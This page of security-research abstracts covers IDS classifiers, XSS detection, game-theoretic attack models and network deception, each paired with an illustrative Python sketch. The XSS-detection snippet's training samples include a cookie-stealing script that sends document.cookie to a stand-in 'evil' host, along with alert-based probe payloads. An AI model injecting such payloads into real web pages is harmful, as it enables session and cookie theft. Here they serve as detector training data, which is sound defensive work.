Bibliography
The security problem of networked control systems (NCSs) under denial-of-service (DoS) attacks with incomplete information is investigated in this paper. Data transmission among different components of an NCS may be blocked by DoS attacks. We use the concept of a security level to describe the degree of security of different components in an NCS. An intrusion detection system (IDS) is used to monitor the invalid data generated by DoS attacks. At each time slot, the defender chooses which component to monitor while the attacker chooses which component to invade. A one-shot game between attacker and defender is built, and both the complete-information and the incomplete-information cases are considered. Furthermore, a repeated game model with belief updating based on Bayes' rule is also established. Finally, a numerical example is provided to illustrate the effectiveness of the proposed method.
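As a rough illustration of the belief-updating step in such a repeated game (not the paper's actual model; the two-component setup, prior, and likelihoods below are assumptions), the defender can revise its belief about the attacker's preferred target via Bayes' rule after each IDS observation:

```python
# Minimal sketch of repeated-game belief updating with Bayes' rule.
# The two-component setup, prior, and likelihoods are assumed for illustration.

def bayes_update(prior, likelihoods, observation):
    """Return posterior P(target | observation) from prior P(target) and P(obs | target)."""
    unnormalized = {t: prior[t] * likelihoods[t][observation] for t in prior}
    total = sum(unnormalized.values())
    return {t: p / total for t, p in unnormalized.items()}

# Defender's prior belief over which component the attacker prefers to target.
belief = {"sensor_link": 0.5, "actuator_link": 0.5}

# Assumed probability that the IDS raises an alert on the monitored component,
# given the attacker's true target.
likelihoods = {
    "sensor_link":   {"alert": 0.8, "no_alert": 0.2},
    "actuator_link": {"alert": 0.3, "no_alert": 0.7},
}

# Repeated play: the belief is updated after each observed IDS outcome.
for obs in ["alert", "alert", "no_alert"]:
    belief = bayes_update(belief, likelihoods, obs)
    print(obs, belief)
```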
Intrusion detection is one of the most prominent and challenging problems faced by cybersecurity organizations. An Intrusion Detection System (IDS) plays a vital role in identifying network security threats, protecting the network from vulnerable source code, viruses, worms, and unauthorized intruders across many intranet/internet applications. Despite the many open-source APIs and tools for intrusion detection, numerous network security problems still exist. These problems are handled through proper pre-processing, normalization, feature selection, and ranking of benchmark dataset attributes prior to applying self-learning-based classification algorithms. In this paper, we perform a comprehensive comparative analysis of the benchmark datasets NSL-KDD and CIDDS-001. To obtain optimal results, we use hybrid feature selection and ranking methods before applying self-learning (machine/deep learning) classification algorithms such as SVM, Naïve Bayes, k-NN, Neural Networks, DNN, and DAE. We analyze the performance of the IDS through prominent performance indicator metrics such as Accuracy, Precision, Recall, and F1-Score. The experimental results show that the k-NN, SVM, NN, and DNN classifiers achieve approximately 100% accuracy on the NSL-KDD dataset, whereas the k-NN and Naïve Bayes classifiers achieve approximately 99% accuracy on the CIDDS-001 dataset.
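A minimal sketch of such a pre-processing, feature-selection, and classification pipeline in scikit-learn is shown below. The tiny synthetic frame only mimics a few NSL-KDD-style columns, and SelectKBest is assumed here as the ranking step; the cited work's exact hybrid selection method is not reproduced.

```python
# Sketch of a pre-processing / feature-selection / classification pipeline.
# The synthetic frame stands in for NSL-KDD records; real experiments would load the full dataset.
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.feature_selection import SelectKBest, mutual_info_classif
from sklearn.pipeline import Pipeline
from sklearn.neighbors import KNeighborsClassifier
from sklearn.metrics import classification_report

df = pd.DataFrame({                       # stand-in for NSL-KDD records
    "duration":      [0, 2, 0, 10, 0, 5, 1, 0] * 10,
    "src_bytes":     [181, 239, 0, 5050, 232, 0, 350, 42] * 10,
    "protocol_type": ["tcp", "tcp", "icmp", "tcp", "udp", "icmp", "tcp", "udp"] * 10,
    "label":         ["normal", "normal", "dos", "dos", "normal", "dos", "normal", "normal"] * 10,
})
X = pd.get_dummies(df.drop(columns=["label"]))   # one-hot encode categorical attributes
y = (df["label"] != "normal").astype(int)        # binary: attack vs. normal

X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, stratify=y, random_state=0)

pipeline = Pipeline([
    ("scale",  StandardScaler()),                          # normalization
    ("select", SelectKBest(mutual_info_classif, k=3)),     # feature selection / ranking
    ("clf",    KNeighborsClassifier(n_neighbors=5)),       # one of the evaluated classifiers
])
pipeline.fit(X_train, y_train)
print(classification_report(y_test, pipeline.predict(X_test)))  # Precision, Recall, F1, Accuracy
```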
Cross-Site Scripting (XSS) is an attack most often carried out by inserting malicious scripts into a website. The attack takes the user to a webpage that has been specifically designed to retrieve user sessions and cookies. Nearly 68% of websites are vulnerable to XSS attacks. In this study, the authors evaluate several machine learning methods, namely Support Vector Machine (SVM), K-Nearest Neighbour (KNN), and Naïve Bayes (NB). Each machine learning algorithm is then combined with n-gram features extracted from the scripts to improve the detection of XSS attacks. The simulation results show that SVM combined with n-grams achieves the highest accuracy, at 98%.
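The combination of character n-gram features with an SVM can be sketched as follows; the toy scripts, labels, and 1-3 character n-gram range are assumptions chosen only to show the feature-plus-classifier pairing.

```python
# Sketch of character n-gram features plus an SVM for XSS script detection.
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.svm import SVC
from sklearn.pipeline import make_pipeline

scripts = [
    "<script>document.location='http://evil/?c='+document.cookie</script>",  # XSS
    "<img src=x onerror=alert(1)>",                                          # XSS
    "<p>Welcome back, please review your order below.</p>",                  # benign
    "<a href='/profile'>View profile</a>",                                   # benign
]
labels = [1, 1, 0, 0]  # 1 = malicious, 0 = benign

model = make_pipeline(
    CountVectorizer(analyzer="char", ngram_range=(1, 3)),  # n-gram features per script
    SVC(kernel="linear"),
)
model.fit(scripts, labels)
# Classify a new script; it shares many n-grams with the malicious examples.
print(model.predict(["<svg onload=alert(document.cookie)>"]))
```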
Designing a machine-learning-based network intrusion detection system (IDS) with high-dimensional features can lead to prolonged classification processes, whereas low-dimensional features can shorten them. Moreover, classification of network traffic with imbalanced class distributions significantly limits the performance attainable by most well-known classifiers, and with imbalanced data the usual metrics may fail to provide adequate information about classifier performance. This study first uses Principal Component Analysis (PCA) as a feature dimensionality reduction approach. The resulting low-dimensional features are then used to build various classifiers, such as Random Forest (RF), Bayesian Network, Linear Discriminant Analysis (LDA), and Quadratic Discriminant Analysis (QDA), for designing an IDS. The experimental findings with low-dimensional features in binary and multi-class classification show better performance in terms of Detection Rate (DR), F-Measure, False Alarm Rate (FAR), and Accuracy. Furthermore, we apply a multi-class combined performance metric, Combined_Mc, that incorporates FAR, DR, Accuracy, and class distribution parameters. In addition, we develop a uniform-distribution-based balancing approach to handle the imbalanced distribution of minority-class instances in the CICIDS2017 network intrusion dataset. Using PCA, we reduce the CICIDS2017 dataset's feature dimensions from 81 to 10 while maintaining a high accuracy of 99.6% in both multi-class and binary classification.
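The PCA-then-classify step can be illustrated with the short sketch below. Synthetic data stands in for CICIDS2017, and Random Forest is used as a representative classifier; only the 81-to-10 reduction mirrors the abstract.

```python
# Sketch of PCA dimensionality reduction followed by a Random Forest IDS classifier.
import numpy as np
from sklearn.decomposition import PCA
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import confusion_matrix

rng = np.random.default_rng(0)
X = rng.normal(size=(1000, 81))          # 81 original features, as in CICIDS2017
y = (X[:, 0] + X[:, 1] > 0).astype(int)  # synthetic binary labels for illustration

X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)

pca = PCA(n_components=10).fit(X_train)            # reduce 81 features to 10
clf = RandomForestClassifier(random_state=0).fit(pca.transform(X_train), y_train)

tn, fp, fn, tp = confusion_matrix(y_test, clf.predict(pca.transform(X_test))).ravel()
print("DR  =", tp / (tp + fn))   # detection rate (recall on the attack class)
print("FAR =", fp / (fp + tn))   # false alarm rate
```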
In this paper, a novel anti-jamming mechanism is proposed to analyze and enhance the security of adversarial Internet of Battlefield Things (IoBT) systems. In particular, the problem is formulated as a dynamic psychological game between a soldier and an attacker. In this game, the soldier seeks to accomplish a time-critical mission by traversing a battlefield within a certain amount of time while maintaining connectivity with an IoBT network. The attacker, on the other hand, seeks the optimal opportunity to compromise the IoBT network and maximize the delay of the soldier's IoBT transmission link. The psychological behavior of the soldier and the attacker is captured using tools from psychological game theory, in which each player's intention to harm the other is incorporated into the utilities. To solve this game, a novel learning algorithm based on Bayesian updating is proposed to find an ε-like psychological self-confirming equilibrium of the game.
This paper describes a machine-assistance approach to grading decisions for values that might be missing or need validation. It uses a mathematical, algebraic form of an expert system instead of the traditional textual or logic forms, and builds a neural-network-like computational graph structure. The expert system is organized into input, hidden, and output layers, which provide a structured approach to knowledge-base organization and a useful abstraction for reuse in data-migration applications in big data, cyber, and relational databases. The approach is further enhanced with a Bayesian probability tree that grades the confidences of value probabilities, instead of the traditional grading of rule probabilities, and estimates the most probable value in light of all evidence presented. This is groundwork for a machine learning (ML) expert system approach in a form that is closer to a neural-network node structure.
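The idea of grading value probabilities rather than rule probabilities can be sketched with a simple Bayesian update over candidate values; the candidate fillers, priors, and evidence likelihoods below are invented for illustration and are not the cited system's knowledge base.

```python
# Minimal sketch of grading candidate values for a missing field with Bayes' rule.

def grade_values(prior, evidence_likelihoods):
    """Combine independent evidence items and return P(value | all evidence)."""
    posterior = dict(prior)
    for likelihood in evidence_likelihoods:          # one dict P(evidence | value) per item
        posterior = {v: posterior[v] * likelihood[v] for v in posterior}
        total = sum(posterior.values())
        posterior = {v: p / total for v, p in posterior.items()}
    return posterior

# Candidate fillers for a missing "country" field in a record being migrated.
prior = {"UK": 0.4, "US": 0.4, "DE": 0.2}
evidence = [
    {"UK": 0.9, "US": 0.3, "DE": 0.2},   # postcode format matches UK conventions
    {"UK": 0.7, "US": 0.6, "DE": 0.1},   # phone prefix consistent with UK or US
]
graded = grade_values(prior, evidence)
print(max(graded, key=graded.get), graded)   # most probable value given all evidence
```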
Cloud systems are becoming more complex and vulnerable to attacks, and cyber attacks are becoming more sophisticated and harder to detect. It is therefore increasingly difficult for a single cloud-based intrusion detection system (IDS) to detect all attacks, because of its limited and incomplete knowledge about attacks. Recent research in cybersecurity has shown that cooperation among IDSs can bring higher detection accuracy in such complex computer systems. Through collaboration, a cloud-based IDS can consult other IDSs about suspicious intrusions and increase its decision accuracy. The problem with existing cooperative IDS approaches is that they overlook untrusted (malicious or not) IDSs that may negatively affect the decision about suspicious intrusions in the cloud. Moreover, they rely on a centralized architecture in which a central agent regulates the cooperation, which contradicts the distributed nature of the cloud. In this paper, we propose a framework that enables IDSs to form trustworthy IDS communities in a distributed manner. We devise a novel decentralized algorithm, based on coalitional game theory, that allows a set of cloud-based IDSs to cooperatively set up their coalitions in such a way that their individual detection accuracy increases, even in the presence of untrusted IDSs.
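A toy version of the coalition-formation intuition is sketched below: a coalition is worthwhile only if aggregating alerts raises every member's accuracy, and an untrusted, low-accuracy IDS should be excluded. The individual accuracies and the majority-vote aggregation rule are assumptions; the cited paper's coalitional-game mechanics are not reproduced.

```python
# Toy sketch: majority voting over independent IDS verdicts as the coalition payoff.
from itertools import product

def majority_vote_accuracy(accuracies):
    """Probability that a strict majority of independent detectors is correct."""
    total = 0.0
    for outcome in product([0, 1], repeat=len(accuracies)):   # 1 = detector correct
        p = 1.0
        for correct, acc in zip(outcome, accuracies):
            p *= acc if correct else 1 - acc
        if 2 * sum(outcome) > len(accuracies):
            total += p
    return total

trusted = [0.85, 0.80, 0.75]          # accuracies of the trustworthy IDSs
untrusted = 0.40                      # an untrusted IDS with poor accuracy

print("trusted coalition:", round(majority_vote_accuracy(trusted), 3))                # ≈ 0.90
print("with untrusted   :", round(majority_vote_accuracy(trusted + [untrusted]), 3))  # ≈ 0.67
# The coalition improves on every member's individual accuracy, but admitting the
# untrusted IDS would lower it, so the coalition is better off excluding it.
```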
Intentionally deceptive content presented under the guise of legitimate journalism is a worldwide information accuracy and integrity problem that affects opinion forming, decision making, and voting patterns. Most so-called 'fake news' is initially distributed over social media conduits like Facebook and Twitter and later finds its way onto mainstream media platforms such as traditional television and radio news. The fake news stories that are initially seeded over social media platforms share key linguistic characteristics, such as making excessive use of unsubstantiated hyperbole and non-attributed quoted content. In this paper, the results of a fake news identification study that documents the performance of a fake news classifier are presented. The Textblob, Natural Language, and SciPy Toolkits were used to develop a novel fake news detector that uses quoted attribution in a Bayesian machine learning system as a key feature to estimate the likelihood that a news article is fake. The resulting process achieves a precision of 63.333% in assessing the likelihood that an article with quotes is fake. This process is called influence mining, and this novel technique is presented as a method that can be used to enable fake news and even propaganda detection. In this paper, the research process, technical analysis, technical linguistics work, and classifier performance and results are presented. The paper concludes with a discussion of how the current system will evolve into an influence mining system.
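The use of quote attribution as a Bayesian feature can be sketched as follows; the regular expressions, the attribution verbs, and the training counts are invented for illustration and are not taken from the cited study.

```python
# Minimal sketch of quote attribution as a feature in a Bayesian fake-news score.
import re

def has_unattributed_quote(text):
    """True if the article contains quoted material with no nearby attribution verb."""
    quotes = re.findall(r'"[^"]+"', text)
    attributed = re.findall(r'"[^"]+"\s*,?\s*(?:said|according to|stated)', text, re.I)
    return len(quotes) > len(attributed)

# Assumed statistics from a labelled training corpus.
p_fake = 0.30                      # prior P(fake)
p_unattr_given_fake = 0.70         # P(unattributed quotes | fake)
p_unattr_given_real = 0.20         # P(unattributed quotes | real)

def p_fake_given_article(text):
    """Posterior P(fake | attribution feature) via Bayes' rule."""
    unattr = has_unattributed_quote(text)
    like_fake = p_unattr_given_fake if unattr else 1 - p_unattr_given_fake
    like_real = p_unattr_given_real if unattr else 1 - p_unattr_given_real
    evidence = like_fake * p_fake + like_real * (1 - p_fake)
    return like_fake * p_fake / evidence

article = 'Officials "confirmed the city will be evacuated tonight" amid the chaos.'
print(round(p_fake_given_article(article), 3))   # higher posterior: the quote lacks attribution
```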
Identifying cyberattack vectors on cyber supply chains (CSC) in the event of cyberattacks is very important for mitigating cybercrime effectively in cyber-physical systems (CPS). However, in the cybersecurity domain, the invincible nature of cybercrime makes it difficult and challenging to predict the threat probability and impact of cyberattacks. Although the cybercrime phenomenon, its risks, and its threats involve a great deal of unpredictability, uncertainty, and fuzziness, cyberattack detection should be practical, methodical, and reasonable to implement. We explore Bayesian Belief Networks (BBN), a knowledge-representation formalism in artificial intelligence, so that probabilistic inference can be applied formally in the cybersecurity domain. The aim of this paper is to use Bayesian Belief Networks to detect cyberattacks on CSC in the CPS domain. We model cyberattacks using a directed acyclic graph (DAG) to determine attack propagation. Further, we use a smart grid case study to demonstrate the applicability of the attack and its cascading effects. The results show that BBN can be adapted to determine uncertainties in the event of cyberattacks in the CSC domain.
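A small sketch of BBN-style inference over an attack-propagation DAG is given below. The three-node chain and all conditional probabilities are assumptions for illustration, loosely echoing the smart-grid cascading idea rather than reproducing the paper's model.

```python
# Sketch of Bayesian Belief Network inference over an attack-propagation DAG.
# DAG: SupplierBreach -> FirmwareTampered -> GridControlCompromised
p_supplier = 0.10                                  # P(supplier breach)
p_firmware = {True: 0.60, False: 0.05}             # P(firmware tampered | supplier breach)
p_grid     = {True: 0.70, False: 0.02}             # P(grid control compromised | firmware tampered)

# Marginal probability of the final compromise, summing over the hidden causes.
p_compromise = 0.0
for supplier in (True, False):
    p_s = p_supplier if supplier else 1 - p_supplier
    for firmware in (True, False):
        p_f = p_firmware[supplier] if firmware else 1 - p_firmware[supplier]
        p_compromise += p_s * p_f * p_grid[firmware]

print(round(p_compromise, 4))   # cascading probability of grid compromise
```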
We present a novel, use-case-agnostic method of identifying and circumventing private data exposure across distributed and high-dimensional data repositories. Examples of distributed high-dimensional data repositories include medical research and treatment data, where more than 300 describing attributes often appear. As such, providing strong guarantees of data anonymity in these repositories is a hard constraint in adhering to privacy legislation. Yet, when applied to distributed high-dimensional data, existing anonymisation algorithms incur high levels of information loss and do not guarantee privacy, defeating the purpose of anonymisation. In this paper, we address this issue by using Bayesian networks to handle data transformation for anonymisation. By evaluating every attribute combination to determine the privacy exposure risk, the conditional probability linking attribute pairs is computed. Pairs with a high conditional probability expose a risk of de-anonymisation similar to quasi-identifiers and can be separated instead of deleted, as in previous algorithms. Attribute separation removes the risk of privacy exposure, and avoiding deletion results in a significant reduction in information loss. In other words, assimilating the conditional probability of outliers directly into the adjacency matrix in a greedy fashion is quick and thwarts de-anonymisation. Since identifying every privacy-violating attribute combination is a W[2]-complete problem, we optimise the procedure with a multigrid solver method by evaluating the conditional probabilities between attribute pairs and aggregating the state-space explosion of attribute pairs through manifold learning. Finally, incremental processing of new data is achieved through inexpensive, continuous (delta) learning.
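The pairwise conditional-probability scoring that flags quasi-identifier-like attribute pairs can be sketched as follows; the toy records, the scoring rule, and the 0.8 separation threshold are assumptions made for this illustration only.

```python
# Sketch of scoring attribute pairs by conditional probability to find pairs to separate.
import pandas as pd
from itertools import permutations

records = pd.DataFrame({
    "zip":       ["1010", "1010", "2020", "2020", "3030"],
    "diagnosis": ["flu",  "flu",  "asthma", "asthma", "flu"],
    "age_band":  ["30-39", "30-39", "40-49", "50-59", "30-39"],
})

THRESHOLD = 0.8   # pairs above this conditional probability are separated, not deleted
for a, b in permutations(records.columns, 2):
    # For each value of attribute a, how concentrated is attribute b? Average over a's values.
    cond = records.groupby(a)[b].apply(lambda s: s.value_counts(normalize=True).max()).mean()
    if cond >= THRESHOLD:
        print(f"separate '{a}' from '{b}' (P ≈ {cond:.2f})")
```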
The reliability of nuclear command, control, and communications has long been identified as a critical component of strategic stability among nuclear states. Advances in offensive cyber weaponry have the potential to undermine this reliability, threatening strategic stability. In this paper we present a game-theoretic model of preemptive cyber attacks against nuclear command, control, and communications. The model is a modification of the classic two-player game of Chicken, a standard game-theoretic model for nuclear brinkmanship. We fully characterize equilibria in both the complete-information game and two distinct two-sided incomplete-information games. We show that when both players have advanced cyber capabilities, conflict is more likely in equilibrium, regardless of the information structure. On the other hand, when at most one player has advanced cyber capabilities, strategic stability depends on the information structure. Under complete information, asymmetric cyber capabilities have a stabilizing effect, in which the player with strong cyber capabilities has the resolve to stand firm in equilibrium. Under incomplete information, asymmetric cyber capabilities can have both stabilizing and destabilizing effects depending on prior beliefs about the opponent's cyber capabilities.
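For readers unfamiliar with the baseline game, the sketch below enumerates the pure-strategy equilibria of an ordinary 2x2 Chicken game. The payoff numbers are textbook Chicken values, not the paper's cyber-modified payoffs, and serve only to show the equilibrium check.

```python
# Sketch of pure-strategy Nash equilibrium enumeration for a 2x2 Chicken-style game.
# payoffs[(row_action, col_action)] = (row_payoff, col_payoff)
payoffs = {
    ("yield", "yield"):  (0, 0),
    ("yield", "stand"):  (-1, 1),
    ("stand", "yield"):  (1, -1),
    ("stand", "stand"):  (-10, -10),   # mutual escalation: the worst outcome
}
actions = ["yield", "stand"]

def is_nash(r, c):
    """No player can gain by unilaterally deviating from (r, c)."""
    row_ok = all(payoffs[(r, c)][0] >= payoffs[(alt, c)][0] for alt in actions)
    col_ok = all(payoffs[(r, c)][1] >= payoffs[(r, alt)][1] for alt in actions)
    return row_ok and col_ok

print([prof for prof in payoffs if is_nash(*prof)])   # [('yield', 'stand'), ('stand', 'yield')]
```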
Cyber reconnaissance is the process of gathering information about a target network for the purpose of compromising systems within that network. Network-based deception has emerged as a promising approach to disrupt attackers' reconnaissance efforts. However, limited work has been done so far on measuring the effectiveness of network-based deception. Furthermore, given that Software-Defined Networking (SDN) facilitates cyber deception by allowing network traffic to be modified and injected on-the-fly, understanding the effectiveness of employing different cyber deception strategies is critical. In this paper, we present a model to study the reconnaissance surface of a network and model the process of gathering information by attackers as interactions with a cyber defensive system that may use deception. To capture the evolution of the attackers' knowledge during reconnaissance, we design a belief system that is updated by using a Bayesian inference method. For the proposed model, we present two metrics based on KL-divergence to quantify the effectiveness of network deception. We tested the model and the two metrics by conducting experiments with a simulated attacker in an SDN-based deception system. The results of the experiments match our expectations, providing support for the model and proposed metrics.
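A KL-divergence-based deception metric in this spirit can be sketched as below: compare how far the attacker's belief over the network's true configuration sits from the ground truth, with and without deception. The belief distributions themselves are assumptions, not the paper's experimental data.

```python
# Sketch of a KL-divergence metric for quantifying deception effectiveness.
import numpy as np

def kl_divergence(p, q):
    """D_KL(p || q) for discrete distributions given as aligned probability arrays."""
    p, q = np.asarray(p, float), np.asarray(q, float)
    mask = p > 0
    return float(np.sum(p[mask] * np.log(p[mask] / q[mask])))

ground_truth      = [1.0, 0.0, 0.0, 0.0]      # the single true network configuration
belief_no_decoy   = [0.7, 0.1, 0.1, 0.1]      # attacker's belief after plain reconnaissance
belief_with_decoy = [0.25, 0.25, 0.25, 0.25]  # belief when deception keeps the attacker uncertain

print("no deception  :", round(kl_divergence(ground_truth, belief_no_decoy), 3))
print("with deception:", round(kl_divergence(ground_truth, belief_with_decoy), 3))
# A larger divergence from the truth indicates more effective deception.
```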